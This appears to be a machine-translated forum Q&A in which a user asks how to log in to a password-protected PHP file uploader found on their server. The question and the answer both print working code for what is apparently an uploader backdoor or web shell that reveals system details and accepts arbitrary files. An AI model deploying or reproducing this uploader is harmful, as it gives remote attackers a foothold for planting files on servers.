1. 首頁
  2. 問答
  3. 輸入正確的密碼登錄php

輸入正確的密碼登錄php

2016-10-08 150 views
-1

我在Linux服務器上有一個PHP腳本,我可以在瀏覽器上顯示它,這個腳本告訴我必須輸入密碼才能登錄(上傳腳本)。 這是PHP代碼:輸入正確的密碼登錄php

<?php 
    session_start(); 
    if($_SESSION["adm"]){ 
     echo '<b>Namesis<br><br>'.php_uname().'<br></b>'; 
     echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; 
     echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; 
     if($_POST['_upl'] == "Upload") { 
      if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { 
       echo '<b>Upload Success !!!</b><br><br>'; 
      } else { 
       echo '<b>Upload Fail !!!</b><br><br>'; 
      } 
     } 
    } 
    if($_POST["p"]) { 
     $p = $_POST["p"]; 
     $pa = md5(sha1($p)); 
     if($pa=="0cc175b9c0f1b6a831c399e269772661") { 
      $_SESSION["adm"] = 1; 
     } 
    } 
?> 

<form action="" method="post"> 
<input type="text" name="p"> 
</form>

我看到密碼是MD5;當我解密這個0cc175b9c0f1b6a831c399e269772661時,我發現結果是「`a`」 ,但是當我輸入「`a`」密碼時,腳本不能成功登錄。 我試過upload.php?p=aupload.pph?p=0cc175b9c0f1b6a831c399e269772661,沒有任何變化。

請如何登錄此腳本。我很擔心。

來源

2016-10-08 walidz

+0

0cc175b9c0f1b6a831c399e269772661是經過MD5 SHA1相當於到密碼,你必須要社交工程師來找到它的確切值 - 你應該增加一個|| $ pas ='newvalue'作爲tempwelvale直到你記得你通過 – KDOT

+0

你能否解釋更多請cuz我已經嘗試過了''a''「密碼並且stil它錯了或者沒有被seccssefuly鎖在 – walidz

+0

難道你不問開發者的頁面?所有哈希硬編碼後,以防止未經授權的訪問。 – martinstoeckli

回答

0

試試這個: 在這裏你不僅使用的md5()SHA1()所以解密 '一' 將是77de54ccf56eb6f7dbf99e4d3be949ab .Thanks

<?php 
session_start(); 
if(isset($_SESSION["adm"]) && $_SESSION["adm"]==1){ 
    echo '<b>Namesis :'.php_uname().'<br></b><br>'; 
    echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; 
    echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; 

    if(isset($_POST['_upl']) && $_POST['_upl']== "Upload") { 
     if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { 
      echo '<b>Upload Success !!!</b><br><br>'; 
     }else { 
      echo '<b>Upload Fail !!!</b><br><br>'; 
     } 
    } 
} 
if(isset($_POST["p"])){ 
    $p = $_POST["p"]; 
    $pa = md5(sha1($p)); 
    if($pa=="77de54ccf56eb6f7dbf99e4d3be949ab"){ 
     $_SESSION["adm"] = 1; 
    } 
} 
?> 
<form action="<?php echo htmlspecialchars($_SERVER["PHP_SELF"]);?>" method="post"> 
    <input type="text" name="p" value="a"> 
    <input type="submit" value="submit"> 
</form>

來源

2016-10-08 08:55:34 AHJeebon

+0

是的,先生,但我想登錄與我的代碼因爲我不能改變它 – walidz

相關問題

 相關問題